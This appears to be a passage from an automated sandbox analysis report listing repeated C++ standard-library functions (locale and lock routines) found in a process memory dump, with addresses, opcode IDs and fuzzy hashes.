                                                                                                                                                                        • Instruction Fuzzy Hash: 6B21B170A45319EBD7209F54DC09FAEBBB8FB05B24F104229F514B72C0D7B06A0497E5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3D7E7 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F3D7EE
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D7F8
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3D849
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D869
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 879590e698ff652cfcdb3d1ded0f80c047a36b27e7b3abef8d7233cd5944c0a3
                                                                                                                                                                        • Instruction ID: 6ae7f02dd7f50d3918596b03e10b1187ac622cc423c27ee80cd310f24b00a388
                                                                                                                                                                        • Opcode Fuzzy Hash: 879590e698ff652cfcdb3d1ded0f80c047a36b27e7b3abef8d7233cd5944c0a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 9E01D631D00619DFCB15FB64EC426BE7BA1AF40770F240449F9006B2D1CF78AE01A791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F427A2 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F427A9
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F427B3
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42804
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42824
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: fc3c9ceedacc7679168e700b1e22e505c8643a1d0c747089e59a08e1e299701b
                                                                                                                                                                        • Instruction ID: a1f5129ee5b432a0563599b4d7998b4819e2ef715f2e01ffb841606d9e54bf11
                                                                                                                                                                        • Opcode Fuzzy Hash: fc3c9ceedacc7679168e700b1e22e505c8643a1d0c747089e59a08e1e299701b
                                                                                                                                                                        • Instruction Fuzzy Hash: E801C431900219DBCB05EBA49C416BE7B61BF84720F240459FE046B3D2CF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3D752 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F3D759
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3D763
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F3D7B4
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F3D7D4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 59f6ec065bf249f60d107bb4d9bb31ac94f9b45102061ceadd9114071bc3ba6a
                                                                                                                                                                        • Instruction ID: e6aa658845bbb121e229d19137c576396916c7bc0d12980cc0a0854e6be4f21b
                                                                                                                                                                        • Opcode Fuzzy Hash: 59f6ec065bf249f60d107bb4d9bb31ac94f9b45102061ceadd9114071bc3ba6a
                                                                                                                                                                        • Instruction Fuzzy Hash: 6401C036900219DBCB05EB649C466BE7BA1AF80730F240509F9146B3D2CF789E05EBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4270D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42714
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4271E
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4276F
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4278F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: dbc647b414d1a3e625cbfabbc67abc02a1addc652d6392f0dea905dd5bd500b0
                                                                                                                                                                        • Instruction ID: 1ef5668268b14c94ae8f5f5172690fb283ece0ac83b9013291046bc8f71b2acd
                                                                                                                                                                        • Opcode Fuzzy Hash: dbc647b414d1a3e625cbfabbc67abc02a1addc652d6392f0dea905dd5bd500b0
                                                                                                                                                                        • Instruction Fuzzy Hash: 9901C03590021ADBCB05FB648C45ABE7FB1BF84760F240559F9146B2D2CF789E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F428CC Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F428D3
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F428DD
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4292E
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4294E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: bfe93805af8b9b1601ce4dcb64efd033c2150b06ca44362521f467468a76a4fc
                                                                                                                                                                        • Instruction ID: 8b465e6ed646679e45021f85be36f7fd5f748ce909e6dc61849e7100831128a9
                                                                                                                                                                        • Opcode Fuzzy Hash: bfe93805af8b9b1601ce4dcb64efd033c2150b06ca44362521f467468a76a4fc
                                                                                                                                                                        • Instruction Fuzzy Hash: DF01C031900619DBCB05EB648C516BE7BB1AF84730F240419F914AB2D2CFB89E05FB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42837 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4283E
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42848
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42899
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F428B9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: e20f554653cd1a90f54a0856624c2a71c1ee2477162cc89cd5a99a806fbc5629
                                                                                                                                                                        • Instruction ID: 2ef76981eb427b07a01295e26658abca04a02e4e47d8419327f8f8b35b983e05
                                                                                                                                                                        • Opcode Fuzzy Hash: e20f554653cd1a90f54a0856624c2a71c1ee2477162cc89cd5a99a806fbc5629
                                                                                                                                                                        • Instruction Fuzzy Hash: E201D631D00519DBCB05EB64CC41ABE7B71BF80760F240519F9146B2D2CF789E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4E96D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4E974
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4E97E
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4E9CF
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4E9EF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 83ece8bae81e0cef8b55fe3888d31d95fef50ea688a5f5b24b0de6c1cf0e1020
                                                                                                                                                                        • Instruction ID: d346ff952cc74fbd5fad278a98893f5e87971d98b822b2827a8c6ce8d7ea0d88
                                                                                                                                                                        • Opcode Fuzzy Hash: 83ece8bae81e0cef8b55fe3888d31d95fef50ea688a5f5b24b0de6c1cf0e1020
                                                                                                                                                                        • Instruction Fuzzy Hash: 4901D231900229DBCB05EB68CC416BE7BA0BF80720F250549FA106B3D2DF789E01FB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4EA02 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EA09
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EA13
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4EA64
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EA84
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 8843c578382c838e7cbb7c853419a181c91cacda15f2f375748aebf37799f97c
                                                                                                                                                                        • Instruction ID: 28f1b08247a5bc8eb2730b30590a1217b8c568395f9a8e7cf4e887dd2bdec752
                                                                                                                                                                        • Opcode Fuzzy Hash: 8843c578382c838e7cbb7c853419a181c91cacda15f2f375748aebf37799f97c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8801C031900219DBCB05EB648C456BE7B60BF84730F2A0909F900AB3D2CF7C9E05AB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4EBC1 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EBC8
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EBD2
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4EC23
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EC43
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 71a9099b1ed0ab9cf121c3b50d30984dbf00ce10a1362144ffdbc7167b45d622
                                                                                                                                                                        • Instruction ID: ef79ea34dee95957e4b35d77ce56ad2102214fc497a9e6662f94e52ae458c276
                                                                                                                                                                        • Opcode Fuzzy Hash: 71a9099b1ed0ab9cf121c3b50d30984dbf00ce10a1362144ffdbc7167b45d622
                                                                                                                                                                        • Instruction Fuzzy Hash: B001C431900119DBCB15EB648C466BE7B70BF80760F240449FA146B2D2CF789E05E791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42BB5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42BBC
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42BC6
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42C17
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42C37
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 0c33af507821651affa5e8f3efdbe6550cd2add6cbc1d0ab62f6caf45c1b6ac9
                                                                                                                                                                        • Instruction ID: d8490209b1eec59f888a2a37465c2e5511af13464640d3a5ec6d586248030a21
                                                                                                                                                                        • Opcode Fuzzy Hash: 0c33af507821651affa5e8f3efdbe6550cd2add6cbc1d0ab62f6caf45c1b6ac9
                                                                                                                                                                        • Instruction Fuzzy Hash: 3501C431900619DBCB15FBA49C416BE7B70AF80730F254419FA106B2D2DF789E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42CDF Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42CE6
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42CF0
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F42D41
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42D61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: d4a58143b9fc464dfc5050721143665165d3805cdb41ce2b0e7252ba981e8265
                                                                                                                                                                        • Instruction ID: 0530460ec83afea53cf67d2400ab243ccd203f0cb20771b4071cf2379c38bcd3
                                                                                                                                                                        • Opcode Fuzzy Hash: d4a58143b9fc464dfc5050721143665165d3805cdb41ce2b0e7252ba981e8265
                                                                                                                                                                        • Instruction Fuzzy Hash: 4101AD31D00219DBCB15EB649C41AAE7B71BF84720F240559F9046B2D2CFB89E05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4EC56 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4EC5D
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EC67
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00F4ECB8
                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4ECD8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2854358121-0
                                                                                                                                                                        • Opcode ID: 789ae0a4edc045f20913f2097e4d18429385a1c917605424d874cd0f4d06687d
                                                                                                                                                                        • Instruction ID: af0b257b97dee98e9525ceafa08473e3e5088e3e08a5ce97722b63d61d6fb2db
                                                                                                                                                                        • Opcode Fuzzy Hash: 789ae0a4edc045f20913f2097e4d18429385a1c917605424d874cd0f4d06687d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9801AD31D00219DBCB05AB649C81AAE7B71BF80770F250409FA056B2D2CF789A05EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F42C4A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F42C51
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F42C5B
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
